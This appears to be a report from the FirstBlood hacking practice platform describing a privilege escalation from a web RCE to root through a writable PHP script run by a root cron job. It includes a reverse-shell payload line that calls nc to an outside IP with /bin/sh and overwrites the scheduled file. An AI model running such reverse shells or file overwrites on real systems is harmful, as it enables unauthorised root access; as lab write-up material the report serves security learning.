FirstBlood-#806 — Privilege escalation when having root
This issue was discovered on FirstBlood v2
On 2021-10-28, twsec Level 2 reported:
From deserialization, we can get an RCE, but we're not root on the machine. This report explains how I was able to do that.
1. With the RCE I'm the user fb-exec.
I made a few Google searches on Linux privilege escalation cheat sheets, and they talk about cron jobs,
so we try to find what kind of cron jobs we have.
2. List the cron jobs.
firstblood and php are of interest.
We cat firstblood and find the following:
php scheduler.php is of interest; now we need to find scheduler.php.
ls -al to see the permissions on this file:
and we see write access, but first let's see its contents.
This file belongs to root but fb-exec can write to it, so we prepare our payload:
printf "<?php system('nc 52.14.6.200 6789 -e /bin/sh'); ?>" > /app/firstblood/scheduler.php
This command overwrites scheduler.php,
and this is what it contains now.
Now on our server we have to listen on that port and wait.
Once we get our connection, we check who we are, and we're root.
P1 CRITICAL
Endpoint: api/checkproof.php
Parameter: proof
Payload: phar file
FirstBlood ID: 35
Vulnerability Type: RCE
A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.